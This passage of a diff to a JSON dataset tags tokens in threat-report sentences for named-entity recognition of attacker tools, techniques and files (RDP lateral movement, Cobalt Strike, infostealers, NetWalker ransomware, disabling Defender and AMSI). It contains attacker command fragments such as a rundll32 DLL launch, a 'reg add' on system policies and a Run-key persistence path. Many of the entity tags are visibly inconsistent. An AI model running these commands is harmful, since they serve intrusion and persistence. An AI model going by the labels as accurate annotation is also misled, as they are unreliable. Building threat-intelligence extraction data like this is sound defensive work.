"server", + "and", + "connecting", + "via", + "RDP," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "From", + "there,", + "the", + "threat", + "actors", + "began", + "connecting", + "to", + "other", + "hosts", + "via", + "RDP,", + "including", + "the", + "a", + "backup", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "did", + "RDP", + "to", + "a", + "few", + "other", + "servers" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "traces", + "of", + "RDP", + "(Remote", + "Desktop", + "Protocol)", + "connections", + "were", + "discovered", + "on", + "multiple", + "compromised", + "hosts", + "utilized", + "for", + "lateral", + "movement" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "started", + "by", + "connecting", + "to", + "a", + "new", + "server", + "via", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Once", + "establishing", + "the", + "RDP", + "connection,", + "they", + "deployed", + "Powertool64.exe," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "kept", + "the", + "remote", + "desktop", + "session", + "alive" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "execute", + "encoded", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "will", + "decode", + "itself" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "base", + "64", + "content" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "Base64", + "encoded", + "script", + "with", + "various", + "components", + "split", + "into", + "different", + "variables", + "for", + "obfuscation", + "purposes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "A", + "service", + "was", + "also", + "created", + "for", + "the", + "agent." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "was", + "installed", + "in", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "svcService", + "Type:", + "user", + "mode", + "serviceService", + "Start", + "Type:", + "auto", + "startService", + "Account:", + "LocalSystem" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "separate", + "service", + "was", + "created", + "for", + "that", + "agent." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "was", + "installed", + "in", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "service", + "was", + "installed", + "in", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Service", + "Type:", + "user", + "mode", + "serviceService", + "Start", + "Type:", + "auto", + "startService", + "Account:", + "LocalSystem" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "observed", + "creating", + "remote", + "services" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "occurred", + "from", + "rundll32.exe,", + "which", + "was", + "previously", + "used", + "to", + "execute", + "and", + "run", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/c", + "rundll32.exe", + "C:\\ProgramData\\x86.dll,", + "StartA" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "its", + "process", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "the", + "driver", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "removing", + "files", + "from", + "the", + "system." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "observed", + "deleting", + "files", + "that", + "had", + "been", + "dropped", + "to", + "disk" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "whoami", + "/groups" + ], + "ner_tags": [ + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "observed", + "creating", + "remote", + "services", + "in", + "order", + "to", + "execute", + "beacon", + "DLL", + "files" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "began", + "to", + "review", + "sensitive", + "documents" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Both", + "HTTP", + "and", + "HTTPS", + "were", + "observed", + "to", + "be", + "used." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Infected", + "email", + "attachments" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtaining", + "relevant", + "device", + "data,", + "such", + "as", + "OS", + "version", + "and", + "architecture,", + "hardware", + "ID,", + "CPU,", + "RAM,", + "screen", + "resolution,", + "system", + "language,", + "etc." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "information,", + "primarily", + "system", + "information" + ], + "ner_tags": [ + "I-Features", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "can", + "take", + "away", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrate", + "files", + "and", + "extract", + "data", + "from", + "specific", + "applications." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "acquire", + "browsing", + "histories,", + "Internet", + "cookies,", + "usernames/passwords,", + "personally", + "identifiable", + "details,", + "credit", + "card", + "numbers,", + "and", + "other", + "highly", + "sensitive", + "information", + "from", + "browsers." + ], + "ner_tags": [ + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "target", + "stored", + "browser", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "sensitive", + "information", + "from", + "the", + "victim’s", + "machine" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "cookie", + "information,", + "search", + "histories,", + "and", + "key", + "inputs", + "from", + "browsers" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "inside", + "of", + "the", + "“Web", + "Data”", + "SQLite", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sensitive", + "data", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usernames/passwords," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "include", + "saved", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "under", + "the", + "name", + "“tmp.exe”", + "by", + "unpacking", + "itself", + "to", + "the", + "“C:\\Users\\admin\\AppData\\Local\\Temp\\”", + "file", + "path." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Registry", + "Key", + "Sets" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "transmits", + "information", + "as", + "a", + "zip", + "file" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "this", + "information", + "to", + "its", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C2", + "is", + "transmitted", + "as", + "a", + "zip", + "file", + "during", + "the", + "POST", + "request." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "transferred", + "to", + "the", + "C2", + "server", + "as", + "a", + "zip", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "transfers", + "them", + "to", + "the", + "C2", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "many", + "obfuscated", + "strings", + "that", + "are", + "being", + "covered", + "by", + "a", + "random", + "string,", + "“edx765“,", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "information," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "the", + "obfuscated", + "string", + "to", + "a", + "function", + "that", + "strips", + "the", + "arbitrary", + "string", + "and", + "delivers", + "the", + "original", + "string" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "the", + "obfuscated", + "string", + "to", + "a", + "function", + "that", + "strips", + "the", + "arbitrary", + "string", + "and", + "delivers", + "the", + "original", + "string." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Making", + "a", + "‘POST’", + "request," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "multiple", + "POST", + "requests", + "to", + "the", + "“c2/sock”", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "accessed", + "C2", + "while", + "visiting", + "port", + "80" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "are", + "instructed", + "to", + "click", + "“Confirm”", + "to", + "view", + "a", + "message", + "from", + "“Express.”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "user", + "is", + "also", + "asked", + "to", + "permit", + "push", + "notifications", + "in", + "the", + "browser," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "decrypted,", + "the", + "configuration", + "file", + "reveals", + "several", + "parameters," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "exclusion", + "list" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "using", + "the", + "RC4", + "algorithm", + "with", + "a", + "hard-coded", + "key", + "in", + "the", + "resource." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "the", + "decryption", + "program" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "decrypted" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "using", + "the", + "RC4", + "algorithm", + "with", + "a", + "hardcoded", + "key", + "in", + "the", + "resource." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "hardcoded", + "key", + "to", + "decrypt", + "the", + "configuration", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "to", + "decrypt", + "the", + "configuration", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get", + "configuration", + "file", + "and", + "decrypt", + "it" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryptor", + "download" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryptor", + "is", + "delivered", + "in", + "a", + "zip", + "archive", + "containing", + "the", + "decryptor", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryptor", + "to", + "clean", + "up", + "their", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "At", + "the", + "end", + "of", + "the", + "decryption", + "process,", + "the", + "program", + "indicates", + "the", + "number", + "of", + "decrypted", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryptor", + "has", + "finished", + "the", + "decryption", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryptor", + "execution" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryptor", + "program", + "appears", + "unique", + "and", + "is", + "linked", + "to", + "one", + "victim", + "specifically.", + "In", + "our", + "example,", + "it", + "only", + "decrypts", + "the", + "files" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "one", + "to", + "get", + "information", + "about", + "the", + "machine,", + "such", + "as", + "the", + "operating", + "system", + "version," + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "one", + "to", + "get", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reflective", + "DLL", + "loading,", + "to", + "inject", + "a", + "DLL", + "from", + "memory." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "Windows", + "API", + "functions", + "to", + "inject", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "a", + "regular", + "Bitmap", + "(open", + "matrix", + "image", + "format", + "used", + "by", + "Windows)", + "that", + "can", + "be", + "used", + "by", + "malware", + "to", + "execute", + "code", + "or", + "as", + "a", + "payload", + "dropper" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "image’s", + "pixels", + "are", + "an", + "actual", + "binary", + "representation", + "of", + "the", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "process", + "can", + "be", + "summarized", + "as", + "Exe", + "->", + "Resources", + "->", + "BMP", + "with", + "embedded", + "data", + "in", + "pixels", + "fetched" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "unpacked", + "malware" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "configuration", + "file", + "encrypted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "Script", + "uses", + "Base64", + "and", + "hexadecimal", + "encoding", + "and", + "XOR-encryption" + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + ".", + "The", + "malware", + "will", + "try", + "first", + "to", + "write", + "in", + "the", + "registry-hive", + "“HKEY_LOCAL_MACHINE”", + "but", + "if", + "it", + "cannot", + "create", + "it,", + "it", + "will", + "use", + "the", + "registry-hive", + "“HKEY_CURRENT_USER”:" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Write", + "in", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "the", + "writing", + "in", + "the", + "registry", + "has", + "been", + "completed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "write", + "in", + "the", + "registry", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Create", + "its", + "own", + "registry", + "key", + "in", + "\\SOFTWARE\\<uniquename>" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "functions", + "“SHGetFolderPathlW”", + "and", + "“CreateFileW”" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "with", + "the", + "function", + "“WriteFile”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "Windows", + "API", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "script", + "will", + "delete", + "the", + "malware", + "sample", + "with", + "its", + "path", + "using", + "the", + "command", + "“del”", + "and", + "finally", + "delete", + "the", + "bat", + "file", + "with", + "the", + "command", + "“del", + "%0%”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "uses", + "the", + "“del”", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "tries", + "to", + "remove", + "itself", + "from", + "the", + "machine", + "to", + "avoid", + "being", + "detected", + "and", + "analyzed", + "by", + "security", + "researchers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "the", + "ransom", + "note" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "download", + "is", + "done", + "directly", + "from", + "the", + "NetWalker", + "Tor", + "site" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "will", + "be", + "able", + "to", + "download", + "the", + "decryptor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Place", + "a", + "value", + "on", + "RunOnce", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "performing", + "password", + "spray," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Activity", + "from", + "a", + "password-spray", + "associated", + "IP", + "address." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "IP", + "address", + "that", + "had", + "been", + "identified", + "as", + "participating", + "in", + "password", + "spray" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credential", + "stuffing", + "attacks" + ], + "ner_tags": [ + "B-Org", + "I-OffAct", + "I-OffAct" + ] + }, + { + "tokens": [ + "is", + "distributed", + "through", + "exposed", + "Remote", + "Desktop", + "Protocol", + "(RDP)", + "setups" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "a", + "heavy", + "emphasis", + "on", + "Remote", + "Desktop", + "Protocols." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "by", + "brute-forcing", + "them" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "other", + "known", + "vulnerabilities", + "for", + "initial", + "access,", + "i.e.", + "vulnerabilities", + "in", + "Citrix", + "gateway", + "devices" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "other", + "tools", + "to", + "gather", + "credentials", + "that", + "include", + "Mimikatz,", + "LaZagne,", + "and", + "NirSoft’s", + "NetPass." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "It", + "uses", + "bat", + "files" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "batch", + "file", + "to", + "stop", + "services" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "stolen", + "credentials", + "are", + "used", + "to", + "reach", + "high-value", + "machines", + "like", + "servers" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMIC", + "/node" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "reg", + "add", + "HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "makes", + "use", + "of", + "API", + "GetTickCount", + "/", + "QueryPerformanceCounter" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "help", + "of", + "ShellExecute", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "itself", + "from", + "the", + "target", + "systems", + "after", + "infection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "also", + "drops", + "and", + "installs" + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "sets", + "the", + "following", + "registry", + "entry", + "to", + "open", + "the", + "downloaded", + "PDF", + "file", + "every", + "time", + "the", + "computer", + "boots" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iXqrVo" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "adding", + "the", + "HIDDEN", + "file", + "attribute" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "adds", + "the", + "HIDDEN", + "file", + "attribute", + "to", + "the", + "file:" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "taking", + "command", + "line", + "arguments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "and", + "execute", + "a", + "remote", + "“note.hta”:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "to", + "download", + "another", + "remote", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "download", + "and", + "execution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "PowerShell", + "to", + "pull", + "and", + "run" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "and", + "executing" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "runs" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes" + ], + "ner_tags": [ + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "download", + "of", + "wed.hta" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "disables", + "AMSI", + "by", + "hijacking", + "the", + "COM", + "server,", + "changing", + "it", + "from", + "\"%windir%\\system32\\amsi.dll\"", + "to", + "\"C:\\IDontExist.dll\"." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "performs", + "the", + "following", + "actions", + "to", + "alter", + "Windows", + "Defender", + "settings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adds", + "the", + "following", + "exclusions", + "to", + "Windows", + "DefenderExtensions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Allows", + "known", + "Windows", + "Defender", + "Threat", + "IDs", + "to", + "execute" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "I-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "Windows", + "Defender", + "Attack", + "Surface", + "Reduction", + "(ASR)", + "rules" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "the", + "following", + "Windows", + "Defender", + "features:Intrusion", + "Prevention", + "System", + "IO", + "AV", + "Protection", + "(does", + "not", + "scan", + "downloaded", + "files", + "and", + "attachments)", + "Realtime", + "monitoring", + "Script", + "scanning", + "Controlled", + "folder", + "access", + "protection", + "PUA", + "protection", + "Scheduled", + "scan" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 